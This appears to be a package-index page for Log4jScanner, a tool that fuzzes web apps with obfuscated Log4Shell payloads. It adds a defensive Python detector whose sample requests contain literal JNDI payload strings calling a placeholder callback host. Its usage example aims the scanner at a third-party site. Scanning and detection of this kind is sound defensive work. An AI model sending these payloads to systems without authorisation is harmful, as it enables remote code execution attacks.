Log4j CVE Vulnerability Scanner - Python Module
Project description
Log4jScanner
Log4jScanner is a scanner for Log4j-related CVEs, designed to help penetration testers perform black-box testing on given subdomains.
Features
- Fast & multithreaded
- Scans for Log4j RCE (CVE-2021-44228, CVE-2021-45046)
- Over 30 obfuscated Log4j payloads
- Mainly designed for mass-scale bug bounty
- Available scan types: Basic Scan & Full Scan
  - In Basic Scan, only 1 basic Log4Shell payload is used for testing the web app
  - In Full Scan, all available Log4Shell payloads are used
- Log4jScanner fuzzes all the potential endpoints, such as:
  - HTTP headers
  - GET-based parameter + without malicious headers
  - POST-based parameter with JSON body + without malicious headers
  - POST-based parameter with POST parameters + without malicious headers
  - GET-based parameter + with malicious headers
  - POST-based parameter with JSON body + with malicious headers
  - POST-based parameter with POST parameters + with malicious headers
- Log4jScanner also tries to fuzz possible POST parameters such as the following (feel free to add/remove any POST parameter):
  ["username", "user", "email", "email_address", "password", "id", "action", "page", "q", "submit", "token", "data", "order", "lang", "search", "redirect", "country", "hidden"]
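For defenders on the receiving end of the fuzzing described above, the following added example (not part of Log4jScanner or its documentation) flags logged requests whose headers, query parameters, or JSON/form body fields contain a JNDI lookup, including one wrapped in nested lookups. The request dict layout, the function names and the sample values are assumptions made for this illustration, and the lookup resolution only approximates Log4j's behaviour.

```python
import json
import re
from urllib.parse import parse_qsl

INNER = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...}, nothing nested inside
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(match):
    """Approximate the text Log4j substitutes for one innermost lookup."""
    body = match.group(1)
    if ":-" in body:                     # ${name:-default}: assume the default is used
        return body.split(":-", 1)[1]
    kind, _, arg = body.partition(":")
    if kind.lower() in ("lower", "upper"):
        return getattr(arg, kind.lower())()
    return ""                            # env, sys, date, ...: value unknown here

def has_jndi_lookup(value, max_rounds=16):
    """True if value is, or unwraps to, a ${jndi:...} lookup (or nests too deep)."""
    for _ in range(max_rounds):
        if JNDI.search(value):
            return True
        unwrapped = INNER.sub(_resolve, value)
        if unwrapped == value:
            return False
        value = unwrapped
    return True                          # nesting this deep is itself worth a look

def suspicious_fields(request):
    """Return sorted (location, name) pairs whose value carries a JNDI lookup."""
    fields = [("header", k, v) for k, v in request.get("headers", {}).items()]
    fields += [("query", k, v) for k, v in parse_qsl(request.get("query", ""), keep_blank_values=True)]
    body = request.get("body", "")
    try:
        parsed = json.loads(body)
        pairs = parsed.items() if isinstance(parsed, dict) else []
    except ValueError:                   # not JSON: treat the body as form-encoded
        pairs = parse_qsl(body, keep_blank_values=True)
    fields += [("body", k, str(v)) for k, v in pairs]
    return sorted((loc, k) for loc, k, v in fields if has_jndi_lookup(v))

# Constructed sample requests (hosts are placeholders), not captured traffic.
SAMPLES = [
    {"headers": {"User-Agent": "${jndi:ldap://callback.example/a}"}, "query": "page=1", "body": ""},
    {"headers": {"X-Api-Version": "${${lower:J}ndi:ldap://callback.example/b}"}, "query": "q=${j${::-n}di:dns://callback.example}", "body": '{"username": "alice"}'},
    {"headers": {"Accept": "*/*"}, "query": "lang=en", "body": "email=a%40example.org&redirect=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fc%7D"},
    {"headers": {"User-Agent": "curl/8.0"}, "query": "q=${date:yyyy}", "body": ""},
]
```

Only top-level JSON keys are inspected; nested JSON objects would need a recursive walk.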
Installation
- Install Python 3 on your system. Python comes preinstalled on Linux and macOS, so there you can simply run the pip command below.
- This Python module is OS independent, so you can install it with either of these pip commands:
$ python3 -m pip install Log4jScanner
OR
$ pip3 install Log4jScanner
Usage
- Type log4jscanner -h for the help menu.
- Only --url-list or --url are mandatory parameters/flags.
- You can also import this module in your code:
from log4jscanner import Log4jScanner

# Constructor signature:
# test = Log4jScanner.Log4jScanner(file_containing_urls, url_list, ThreadNumber, timeout, custom_dns_callback_host, dns_callback_provider, disable_redirect, exclude_user_agent_fuzzing, basic_scan, file_containing_headers)
# Available headers file paths: db/headers-large.txt, db/headers-minimal.txt, db/headers.txt
# Or you can give the full path of a file containing HTTP request headers
test = Log4jScanner.Log4jScanner("", ["https://google.com"], 30, 30, "", "interact.sh", False, False, False, "db/headers.txt")

# start() runs the scan; the returned list is iterated as the vulnerable URLs
vuln_url_list = test.start()
for url in vuln_url_list:
    print(url)
Download files
Source Distribution
Log4jScanner-1.0.tar.gz (15.9 kB)
Built Distribution
File details
Details for the file Log4jScanner-1.0.tar.gz.
File metadata
- Download URL: Log4jScanner-1.0.tar.gz
- Upload date:
- Size: 15.9 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.27.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.0
File hashes
Algorithm | Hash digest
---|---
SHA256 | 2b97d38e87c502b00a9178471820d537d9beee2d3abaca6c70b749613c3c856b
MD5 | 9ccd769d29565295aa273b1748592939
BLAKE2b-256 | 3e89acb11af870fe5e3ff832b612dffb5f8ee0a469ec4c2c78292c25de43b8c9
File details
Details for the file Log4jScanner-1.0-py3-none-any.whl.
File metadata
- Download URL: Log4jScanner-1.0-py3-none-any.whl
- Upload date:
- Size: 29.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.27.1 requests-toolbelt/0.9.1 tqdm/4.60.0 CPython/3.9.0
File hashes
Algorithm | Hash digest
---|---
SHA256 | ca12228ec000fb8d49c3f4696c342a149b07a3fd628be6582195169a7bf573da
MD5 | 000b16a9036dc8c7b2bd17ad3a657e2d
BLAKE2b-256 | f6a112614866caa6fa68e9465b9bde677ddcac67c5a79f18cf87f9ff455da14a